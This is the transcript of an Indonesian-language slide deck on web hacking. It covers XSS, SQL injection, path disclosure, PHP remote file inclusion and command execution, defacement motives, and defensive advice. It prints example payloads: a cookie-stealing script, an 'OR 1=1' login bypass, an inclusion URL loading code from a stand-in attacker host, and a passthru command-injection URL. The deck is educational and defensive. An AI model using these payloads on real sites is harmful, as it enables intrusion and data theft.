web Hacking Bahasa Indonesia.pdf
-
Upload
chairil-anwar -
Category
Documents
-
view
56 -
download
15
Transcript of web Hacking Bahasa Indonesia.pdf
-
Ahmad Muammar W. K.http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Details Web Hacking Threat Simulation Impact Discussion
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Web Hacking Hacking melalui HTTP [ hacking over http ] Hacking terhadap Web Application Melalui port 80 ; port HTTP Memanfaatkan kelemahan dari web application Web browser attack Bypassing Firewall ? Menggunakan HTTP rules (method)
Get , Put , Post, Options , find , Delete, Trace
www.rajaebookgratis.com
-
Hyper Text Transfer Protocol (HTTPHTTP) terletak pada bagian atas dari gambar Security level yaitu APLIKASI
www.rajaebookgratis.com
-
http request(clear text/ ssl)
FirewallUserWeb Server
Database Server
Web application
ApacheIISTomcatNetscape
Http reply (HTML, Javascript, VBscript)
PluginsPerlPHPJSPE.t.c
MsSQLPostgreMysqlOracle
www.rajaebookgratis.com
-
Ahmad Muammar W. K.http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
Web Hacking
Client side attack (xss, cookies stealing)
Information Disclosure
OS commanding (SQL, SSI, Ldap, Xpath )
Brute Force
Path travesal
Denial Of Service
Remote command execution (php)
Sumber: http://www.webappsec.org
Etc
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Client Side AttackCross Site ScriptingSuatu Jenis Serangan dengan cara memasukkan code/script HTML (javascript) kedalam suatu web site dan dijalankan melalui browser di clientContoh alert(document.cookie)
Mendapatkan Cookies yang berisi info berharga milik client yang digunakan oleh server untuk proses authentikasi
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Information DisclosurePredictable resource locationJenis serangan dengan menebak letak resource yang disembunyikan dan umumdi gunakan oleh web aplikasi
Contoh : /admin/ /backup/ /logs/ /PhpMyadmin/ admin.php login.php
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
SQL injectionSuatu Cara untuk Mengexploitasi Web Application yang menggunakan suatudatabase , dan memasukan command sql ,sehingga membentuk suatu query yang akan dieksekusi dan dijalankan oleh sql server.
Contoh: http://victim.com/login.asp yang menerima input user dan passattacking input user = test OR 1=1 && input pass =test
Syntax SQL : select * from users where pass=test and user = testor1=1
Passing the login box !!!
www.rajaebookgratis.com
-
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Path TraversalSuatu jenis vulnerabilities yang mengakibatkan user dapat melihat secara lengkappath suatu direktori atau file dari suatu situs/website
Contoh : http://target.com/appx/Sources/Admin.phpFatal error: Call to undefined function:is_admin() in /var/www/html/user/target/appx/Sources/Admin.php on line 32Diketahui bahwa halaman web target.com terletak di /var/www/html/user/target
Kegunaan bagi attackerMempersingkat waktu untuk mencari letak web direktori targetInformasi tambahan jika telah memiliki akses ke server.= pwd pada situs target
www.rajaebookgratis.com
-
Ahmad Muammar W. K.http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Remote file inclusion Remote Command execution
PHP under attack*
*2 jenis serangan terhadap web aplikasi yang berbasis php
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
PHP under attackRemote File inclusionSuatu jenis serangan yang dilakukan dengan meng-include-kan halaman web lain kepada suatu situs/web aplikasi.
ContohSitus yang vulnerable http://victim.com/index.php?file=readme.txt
URL code :http://victim.com/index.php?file=http://echo.or.id
www.rajaebookgratis.com
-
http://echo.or.id
victim
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
PHP under attack Shot ! Modifikasi inclusion page
Change url http://echo.or.id > http://attacker.xxx/in.txt
www.rajaebookgratis.com
-
Real site
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
PHP under attack Remote Command Execution
Suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang vulnerable akan mengeksekusi request yang di kirimkan.
ContohSitus yang vulnerable http://victim.com/viewtopic.php?t=48
URL code: http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
www.rajaebookgratis.com
-
www.rajaebookgratis.com
-
Ahmad Muammar W. K.http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
Most Impact Defacing Data Stolen Etc
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
DefacingKegiatan merubah/merusak tampilan suatu website baik halamanutama (index) ataupun halaman lain yang masih terkait dalam satuurl dengan website tersebut (folder lain ; file lain)
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
MotivesDendam atau perasaan gak puas*Kenikmatan tersendiri, 'defacer' merasa tertantangIntrik politik, SosialPenyampaian pesanKeuntungan MaterillPrestice dalam kelompok
www.rajaebookgratis.com
-
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
www.rajaebookgratis.com
-
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
As a UserGunakan Firewall, Antivirus, Anti Trojan, Good Backup Facility dsbPenggunaan Password / pass phrase yang baikBerhati hati terhadap semua tawaran menggiurkan (attachment/program)Penggunaan fasilitas secara hati hati (warnet; public internet caf)Penggunaan Secure login/Secure connection (https ; ssh)Update Informasi
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
As a DeveloperSecure programmingGunakan Input Validation yang baikGunakan Enkripsi untuk authentikasi dan proses lain yang di anggap perluMatikan error_log ( kecuali saat development )Sesuai Kebutuhan dan kemampuan !Update informasi secara general dan informasi specifik engine yang digunakan
www.rajaebookgratis.com
-
http://google.com/search?q=y3dips
As an AdministratorPolicy (strict restriction)Setting Optimal (Sesuai kebutuhan) pada environtment ; configurasi serverBatasi Fungsi yang bisa berinteraksi dengan system environtment
Php (passthru , system, exec) ; msSQL (xp_cmdshell, xp_regdeletekey, xp_msver)
Update Patch terbaru untuk application Selalu Update Informasi
www.rajaebookgratis.com
-
Ahmad Muammar W. K.http://google.com/search?q=y3dips
www.rajaebookgratis.com